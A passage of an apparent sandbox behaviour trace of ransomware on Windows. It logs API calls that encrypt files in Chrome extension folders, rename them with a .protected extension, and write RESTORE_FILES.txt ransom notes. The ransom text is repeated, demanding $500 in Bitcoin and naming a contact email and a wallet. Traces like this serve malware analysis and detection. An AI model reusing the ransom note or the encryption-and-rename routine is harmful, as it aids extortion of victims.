us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.014] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.014] CloseHandle (hObject=0x164) returned 1 [0084.014] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0084.014] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0084.014] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned 150 [0084.014] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0084.015] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*") returned 152 [0084.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.015] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\.") returned 152 [0084.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\..") returned 153 [0084.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.015] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.015] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.015] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.016] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json") returned 164 [0084.016] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.016] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.018] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.018] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.018] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.018] CloseHandle (hObject=0x168) returned 1 [0084.018] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected") returned 174 [0084.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.protected")) returned 1 [0084.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.019] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\RESTORE_FILES.txt") returned 168 [0084.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.019] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.019] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.020] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.020] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.020] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.020] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.020] CloseHandle (hObject=0x164) returned 1 [0084.020] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Windows") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Program Files") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="Program Files (x86)") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="$Recycle.bin") returned 1 [0084.020] lstrcmpiW (lpString1="zh", lpString2="System Volume Information") returned 1 [0084.020] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned 150 [0084.020] lstrcmpW (lpString1="zh", lpString2=".") returned 1 [0084.020] lstrcmpW (lpString1="zh", lpString2="..") returned 1 [0084.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*") returned 152 [0084.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.021] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\.") returned 152 [0084.021] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\..") returned 153 [0084.021] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.021] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.021] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.021] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.021] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json") returned 164 [0084.022] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.022] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.023] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.023] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.023] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.024] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.024] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.024] CloseHandle (hObject=0x168) returned 1 [0084.024] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected") returned 174 [0084.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.protected")) returned 1 [0084.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.024] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\RESTORE_FILES.txt") returned 168 [0084.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.025] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.025] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.025] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.025] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.026] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, 